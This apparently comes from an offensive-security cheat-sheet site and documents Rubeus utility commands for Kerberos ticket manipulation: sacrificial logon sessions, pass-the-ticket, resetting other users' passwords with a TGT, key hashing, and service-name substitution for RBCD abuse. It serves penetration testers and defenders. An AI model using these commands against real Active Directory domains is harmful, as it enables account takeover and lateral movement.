🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🎟️ Rubeus / Miscellaneous Commands

Miscellaneous Commands

Utility commands: process creation, password change, hash calculation, ticket manipulation.

createnetonly

Create a hidden process with LOGON_TYPE 9 (NewCredentials / runas /netonly). Used to create a sacrificial logon session for applying tickets without clobbering the current session.

Usage

Rubeus.exe createnetonly /program:"<exe-path>" [/show] [/ticket:<ticket> | /ticket:<file>.kirbi]

Options

  • /program:"<exe-path>" β€” path to executable to launch
  • /show β€” display the created process window (default: hidden)
  • /ticket:<ticket> β€” inject ticket into the new process immediately

Examples

# Create hidden process
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe"

# Create visible cmd.exe
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# Create and inject ticket
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:<ticket>.kirbi

# Then apply another ticket to that LUID (elevated)
Rubeus.exe ptt /luid:0x4a091c0 /ticket:<ticket>

changepw

Reset a user's Kerberos password using an existing TGT (Aorato technique / MS kpasswd). Equivalent to Kekeo's misc::changepw.

Usage

Rubeus.exe changepw </ticket:<ticket> | /ticket:<file>.kirbi> /new:<new-password> [/dc:<dc-ip>] [/targetuser:<domain>\<username>]

Options

  • /ticket:<ticket> β€” TGT or kadmin/changepw service ticket
  • /new:<new-password> β€” new password to set
  • /dc:<dc-ip> β€” domain controller (port 464)
  • /targetuser:<domain>\<username> β€” change another user's password (requires sufficient privileges)

Examples

# Change own password
Rubeus.exe changepw /ticket:<ticket> /new:<new-password>

# Change another user's password
Rubeus.exe changepw /ticket:<ticket> /new:<new-password> /targetuser:<domain>\<username>

# First get a TGT
Rubeus.exe asktgt /user:<username> /password:<password> /changepw

hash

Calculate Kerberos encryption keys (rc4_hmac, aes128, aes256, des_cbc_md5) from a plaintext password.

Usage

Rubeus.exe hash /password:<password> [/user:<username>] [/domain:<domain>]

Options

  • /password:<password> β€” plaintext password to hash
  • /user:<username> β€” username (required for AES/DES β€” used as salt)
  • /domain:<domain> β€” domain (required for AES/DES β€” used as salt)

Examples

# RC4/NTLM only
Rubeus.exe hash /password:<password>

# All hash types (AES requires user+domain for salt)
Rubeus.exe hash /password:<password> /user:<username> /domain:<domain>

tgssub

Substitute an alternate service name (sname) into an existing service ticket. Exploits the fact that the sname field in a KRB-CRED is not protected by signature, only the server name is.

Usage

Rubeus.exe tgssub </ticket:<ticket> | /ticket:<file>.kirbi> /altservice:<spn> [/srealm:<domain>] [/ptt] [/luid] [/nowrap]

Options

  • /ticket:<ticket> β€” source service ticket (base64 or .kirbi)
  • /altservice:<spn> β€” replacement service name:
  • Standalone sname: cifs, ldap, host
  • Full SPN: cifs/<computer>.<domain>
  • /srealm:<domain> β€” optional: change the service realm
  • /ptt β€” inject resulting ticket
  • /luid β€” apply to specific LUID (elevated)
  • /nowrap β€” don't line-wrap

Examples

# Substitute cifs for ldap in a service ticket
Rubeus.exe tgssub /ticket:<ticket> /altservice:cifs /ptt

# Full SPN substitution (RBCD abuse)
Rubeus.exe tgssub /ticket:<ticket> /altservice:cifs/<computer>.<domain> /ptt

currentluid

Display the current user's logon ID (LUID).

Rubeus.exe currentluid

logonsession

Display information about the current logon session (or all sessions if elevated).

Rubeus.exe logonsession [/current] [/luid:<luid>]

asrep2kirbi

Convert an AS-REP and a client session key into a usable Kirbi (KRB-CRED).

Rubeus.exe asrep2kirbi /asrep:<base64-or-filepath> </key:<base64-key> | /keyhex:<hex-string>> [/enctype:DES|RC4|AES128|AES256] [/ptt] [/luid:<luid>] [/nowrap]

kirbi

Manipulate Kirbi files β€” currently supports inserting/replacing the session key.

Rubeus.exe kirbi /kirbi:<base64-or-filepath> /sessionkey:<session-key> /sessionetype:DES|RC4|AES128|AES256 [/ptt] [/luid:<luid>] [/outfile:<output>] [/nowrap]

Global Flags

These flags apply to all commands:

  • /nowrap β€” prevent base64 output from being line-wrapped
  • /consoleoutfile:C:\output.txt β€” redirect all console output to file
  • /debug β€” output ASN.1 debugging information

Decode Base64 Ticket

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-blob>"))